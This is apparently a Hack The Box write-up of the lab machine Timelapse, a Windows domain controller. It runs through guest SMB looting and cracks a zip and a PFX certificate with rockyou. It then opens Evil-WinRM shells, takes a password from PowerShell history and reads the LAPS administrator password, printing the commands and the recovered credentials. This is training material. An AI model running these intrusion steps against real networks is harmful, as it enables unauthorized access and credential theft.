Post

Hack The Box Write-Up Timelapse - 10.10.11.152

About Timelapse

In this post, I’m writing a write-up for the machine Timelapse from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Timelapse is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag you points will be raised by 30.

Foothold

After doing a port scan with Nmap on the machine, we can discover 11 open network ports. After enumerating port 445/tcp, we can find some interesting information, starting with a password-protected zip file named winrm_backup.zip and documentation about LAPS. After cracking the password, we have access to a certificate with a private key.

User

After cracking the password of the PFX-file, we can extract the private key from the certificate and establish an Evil-WinRM session as the user legacyy. After doing some enumeration with WinPEAS we can find the password for the user account svc_deploy in the PowerShell History File ConsoleHost_history and perform a lateral movement to svc_deploy.

Root

In the SMB enumeration step, we have found some information about LAPS. We can assume that LAPS is active on the machine, and a backup is in place to the Active Directory. We can read the password from administrator by reading the attribute value ms-Mcs-AdmPwd from the machine DC01. With Evil-WinRM we can establish a session to this machine and read the root flag.

Machine Info

Machine Name: Timelapse
Difficulty: Easy
Points: 30
Release Date: 26 Mar 2022
IP: 10.10.11.152
Creator: d4rkpayl0ad

Recon

As always we start the machine with a port scan with Nmap.

1
2
┌──(root💀kali)-[/home/kali/htb/machines/timelapse]
└─# nmap -sC -sV -oA ./nmap/timelapse 10.10.11.152

The results.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-20 15:14 EDT
Nmap scan report for 10.10.11.152
Host is up (0.025s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-05-21 03:14:31Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m58s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-05-21T03:14:36
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.62 seconds

Wow, we found 11 open network ports. That’s quite a large attack surface. The interesting ports are 53/tcp (DNS), 88/tcp (Kerberos), 389/tcp (LDAP) and 445/tcp (SMB). Let’s start enumerating those ports.

Enumeration

Enumerate SMB

Let’s start with port 445/tcp the SMB protocol with smbmap with the username Guest, this is a default user which is created on the installation of Windows. Most IT admins are disabling this user, but maybe we are lucky.

1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[/home/kali/htb/machines/timelapse]
└─# smbmap -H 10.10.11.152 -u Guest -p ""                                                                                                                        2 ⨯
[+] IP: 10.10.11.152:445        Name: timelapse.htb                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Shares                                                  READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share

It’s our lucky day! We have a list of the SMB shares. We have READ ONLY access to the share Shares. We can establish a connection to this share with smbclient.

Intrusion

Anonymous SMB access

1
2
3
4
5
6
7
8
9
┌──(root💀kali)-[/home/kali/htb/machines/timelapse]
└─# smbclient //10.10.11.152/Shares -U Guest
Password for [WORKGROUP\Guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

For a user-friendly way to investigate, we enable recursive on our SMB console session and download all the files in the share Shares to our machine.

1
2
3
4
5
6
7
8
9
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \Dev\winrm_backup.zip of size 2611 as Dev/winrm_backup.zip (20.7 KiloBytes/sec) (average 20.7 KiloBytes/sec)
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as HelpDesk/LAPS.x64.msi (1178.0 KiloBytes/sec) (average 1042.4 KiloBytes/sec)
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as HelpDesk/LAPS_Datasheet.docx (755.4 KiloBytes/sec) (average 1009.7 KiloBytes/sec)
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as HelpDesk/LAPS_OperationsGuide.docx (2456.3 KiloBytes/sec) (average 1265.9 KiloBytes/sec)
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as HelpDesk/LAPS_TechnicalSpecification.docx (577.1 KiloBytes/sec) (average 1211.7 KiloBytes/sec)
smb: \>

Let’s start analyzing the files. We have to directories Dev and Helpdesk. The directory Dev contains a password-protected zip file, named winrm_backup.zip.

The directory Helpdesk contains documentation about LAPS, also known as Local Administrator Password Solution. This tool provides management of local administrator passwords of domain-joined machines and back-up those passwords to the Active Directory.

We start with cracking the password of the winrm_backup.zip file with fcrackzip.

1
2
3
4
5
┌──(root💀kali)-[/home/…/timelapse/smb/Shares/Dev]
└─# fcrackzip winrm_backup.zip -u -D -p /usr/share/wordlists/rockyou.txt winrm_backup.zip


PASSWORD FOUND!!!!: pw == supremelegacy

Crack the PFX-file

We have access to the PFX file legacyy_dev_auth.pfx. This file is a PKCS#12 file, and contains the SSL certificate (public key) with the corresponding private key. To access the private key, we need to decrypt the certificate. With crackpkcs12, we can try to crack the password and extract the private key.

First, we need to install crackpkcs12.

1
2
3
4
5
sudo git clone https://github.com/crackpkcs12/crackpkcs12
cd crackpkcs12
./configure
make
sudo make install

Now, we can start crackin.

1
2
3
4
5
6
7
8
9
┌──(root💀kali)-[/home/…/machines/timelapse/crackpkcs12/src]
└─# ./crackpkcs12 -d /usr/share/wordlists/rockyou.txt -v /home/kali/htb/machines/timelapse/smb/Shares/Dev/legacyy_dev_auth.pfx

Dictionary attack - Starting 4 threads

Performance:              3232793 passwords [   10900 passwords per second]
*********************************************************
Dictionary attack - Thread 4 - Password found: thuglegacy
*********************************************************

Now we have the password. We can start extracting the private key and the certificate from each other with openssl.

1
2
3
4
5
┌──(root💀kali)-[/home/…/timelapse/smb/Shares/Dev]
└─# openssl pkcs12 -in ./legacyy_dev_auth.pfx -nocerts -out legacyy.key                         
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

Extract the certificate.

1
2
3
┌──(root💀kali)-[/home/…/timelapse/smb/Shares/Dev]
└─# openssl pkcs12 -in ./legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy.crt
Enter Import Password:

We got left with two files.

1
2
3
┌──(root💀kali)-[/home/…/timelapse/smb/Shares/Dev]
└─# ls                                                                                                                                                                           
legacyy.crt  legacyy_dev_auth.pfx  legacyy.key

As the name of the PFX certificate already mentions, we can use these files to establish a connection with Evil-WinRM to the machine. A username is not needed.

Shell as legacyy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root💀kali)-[/home/…/timelapse/smb/Shares/Dev]
└─# evil-winrm -i 10.10.11.152 -c ./legacyy.crt -k legacyy.key --ssl
zsh: /usr/local/bin/evil-winrm: bad interpreter: /usr/bin/ruby2.7: no such file or directory

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy

We can now read the user.txt.

1
2
*Evil-WinRM* PS C:\Users\legacyy\Documents> type ../Desktop/user.txt
6a49a264e3820be0ebcef0b039687432

There are two another user accounts listed on this machine svc_deploy and TRX. We need to do a lateral move to one of these user accounts.

Lateral Movement

Move from legacyy to svc_deploy

Let’s start with doing some enumeration. Since this is a Windows machine we use WinPEAS.

1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEASx64.exe
...
[+] Searching known files that can contain creds in home
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
    C:\Users\legacyy\NTUSER.DAT
  C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

WinPEAS finds the file ConsoleHost_history.txt interessting, and so do I. Let’s check the contents.

1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
*Evil-WinRM* PS C:\Users\legacyy\Documents>

The contents is interessting, we can now lateral move ourselves to svc_deploy with Evil-WinRM.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[/home/…/htb/machines/timelapse/http]
└─# evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' --ssl
zsh: /usr/local/bin/evil-winrm: bad interpreter: /usr/bin/ruby2.7: no such file or directory

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

Privilege Escalation

Own Timelapse

The last part is the easiest one. LAPS is saving the password for the local administrator account in the Active Directory on the machine object in the attribute ms-Mcs-AdmPwd.

1
2
3
4
5
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> get-adcomputer dc01 -properties * | select ms-Mcs-AdmPwd

ms-Mcs-AdmPwd
-------------
75715dQ$XUS9u9PW]5mk;]j+

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.